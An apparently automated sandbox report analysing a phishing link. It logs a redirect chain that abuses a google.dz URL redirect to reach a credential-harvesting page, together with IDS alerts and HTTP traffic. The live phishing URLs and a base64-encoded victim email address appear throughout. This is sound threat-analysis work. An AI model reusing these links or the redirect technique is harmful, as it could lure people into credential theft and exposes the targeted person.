Edit tour

Windows Analysis Report
https://google.dz/url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fhandlingservice.com.br%2fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==。$$$。

Overview

General Information

Sample URL:https://google.dz/url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fhandlingservice.com.br%2fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==。$$$。
Analysis ID:1567652
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious Javascript
Detected suspicious crossdomain redirect

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 4000 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 6472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2256,i,11265624852197231515,14874182211913071364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 6976 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://google.dz/url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fhandlingservice.com.br%2fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-03T17:51:44.441178+010028570901Successful Credential Theft Detected164.92.191.86443192.168.2.649762TCP

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 1.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://cjcjjdkdkfkfje.gharelokhana.com/?km=YW15Lm...Code shows multiple high-risk indicators: heavy obfuscation (encoded strings and complex variable naming), use of dynamic array manipulation and string operations that could be hiding malicious payload, and potential eval-like functionality through complex function construction patterns. The code structure suggests deliberate attempt to hide its true purpose.
Source: unknownHTTPS traffic detected: 20.190.147.10:443 -> 192.168.2.6:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49774 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49807 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49831 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49832 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49862 version: TLS 1.2

Networking

barindex
Source: Network trafficSuricata IDS: 2857090 - Severity 1 - ETPRO PHISHING JS/PsyduckPockeball Payload Inbound : 164.92.191.86:443 -> 192.168.2.6:49762
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.dz to https://handlingservice.com.br/yoya/sitg/yw15lmdpbhbpbkbjagvyb2tlzwjyawnrlmnvbq==$$$
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fhandlingservice.com.br%2fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82 HTTP/1.1Host: google.dzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2Fhandlingservice.com.br%2Fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82 HTTP/1.1Host: www.google.dzConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /amp/s/handlingservice.com.br/yoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82 HTTP/1.1Host: www.google.dzConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=519=QwvK-YsQkeGDsv9h92JL7g8Bxmi17LYPohkXyYCSaih1wDYjcODLjewFr-Qf2lPg2LPHbJZ179qVuKrRKPYeQH1KvbHcKTdvKNNcNCDcRfXJhI7Ur7aZyoIlbAzJ8qNaxI1CDcV3Ph_ak9v0D_aQ8FBEIxtu3Dy6Jg9Xf8C198LYVZF0Moqqcz8FadBGB2ot5WUS
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=NyhtEpSE923+nrz&MD=EntUVEoZ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /yoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82 HTTP/1.1Host: handlingservice.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: handlingservice.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://handlingservice.com.br/yoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?km=YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%C3%A3%C2%80%C2%82$$$%C3%A3%C2%80%C2%82 HTTP/1.1Host: cjcjjdkdkfkfje.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://handlingservice.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
